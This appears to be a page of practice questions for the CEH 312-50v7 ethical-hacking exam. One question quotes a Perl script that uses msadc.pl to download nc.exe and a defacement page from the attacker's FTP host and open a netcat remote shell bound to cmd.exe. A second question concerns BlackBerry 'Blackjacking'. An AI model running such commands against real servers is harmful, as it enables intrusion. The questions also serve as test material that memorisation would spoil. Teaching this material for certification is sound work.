PrepAway - Latest Free Exam Questions & Answers

Category: 312-50v7

Exam 312-50v7: Ethical Hacking and Countermeasures V7

Which exploit is indicated by this script?

A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows

NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On
further research, the tester come across a perl script that runs the following msadc
functions:system(“perl msadc.pl -h $host -C \”echo open $your >testfile\””); system(“perl msadc.pl
-h $host -C \”echo $user>>testfile\””); system(“perl msadc.pl -h $host -C \”echo
$pass>>testfile\””); system(“perl msadc.pl -h $host -C \”echo bin>>testfile\””); system(“perl
msadc.pl -h $host -C \”echo get nc.exe>>testfile\””); system(“perl msadc.pl -h $host -C \”echo get
hacked.html>>testfile\””); (“perl msadc.pl -h $host -C \”echo quit>>testfile\””); system(“perl
msadc.pl -h $host -C \”ftp \-s\:testfile\””); $o=; print “Opening …\n”; system(“perl msadc.pl -h
$host -C \”nc -l -p $port -e cmd.exe\””);
Which exploit is indicated by this script?

What tool should the analyst use to perform a Blackjacking attack?

A large company intends to use Blackberry for corporate mobile phones and a security analyst is
assigned to evaluate the possible threats. The analyst will use the Blackjacking attack method to
demonstrate how an attacker could circumvent perimeter defenses and gain access to
the corporate network. What tool should the analyst use to perform a Blackjacking attack?


Page 47 of 51« First...102030...4546474849...Last »